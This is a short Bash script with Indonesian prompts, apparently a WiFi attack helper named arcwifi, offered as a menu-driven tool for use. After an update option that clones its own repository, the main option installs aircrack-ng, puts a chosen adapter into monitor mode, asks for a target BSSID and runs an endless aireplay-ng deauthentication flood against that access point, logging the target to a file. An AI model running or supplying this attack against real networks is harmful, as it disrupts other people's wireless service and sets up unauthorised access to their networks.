#!/bin/bash
clear
date
echo "   \\1.4r menu\\"
read -p "[lanjutkan hacking] [update]" pil;
case $pil in



update)
  echo "[[update]]*"
  cd 
  rm -r arcwifi
  git clone https://github.com/afri64/arcwifi
  echo "arcwifi selesai di update"
;;



lanjutkan)

mkdir hacked_wifi
clear
sudo apt-get install aircrack-ng 
clear
echo hack wifi [tab]

echo .           '==[silahkan masukan nama adapter anda dan tambahkan mon]=='
read adapterwifi
sudo airmon-ng start $adapterwifi

clear
echo .                          '[[==[masukan bssid target]==]]'

read trgtbssid

clear

echo =[+] klik enter untuk hack wifi $wifitrgt
echo =[+] silahkan selesaikan pertanyaan di tab lain
echo =[+] jika sudah klik enter
read selesai
cd hacked_wifi
echo "
============================================
[nama adapter wifi : $adapterwifi 
[bssid target : $trgtbssid  $selesai      
============================================
 ____________
[ARC dev soft]" > last_hacking_data.txt

sudo aireplay-ng -0 0 -a $trgtbssid $adapterwifi

;;
*)
 exit

esac
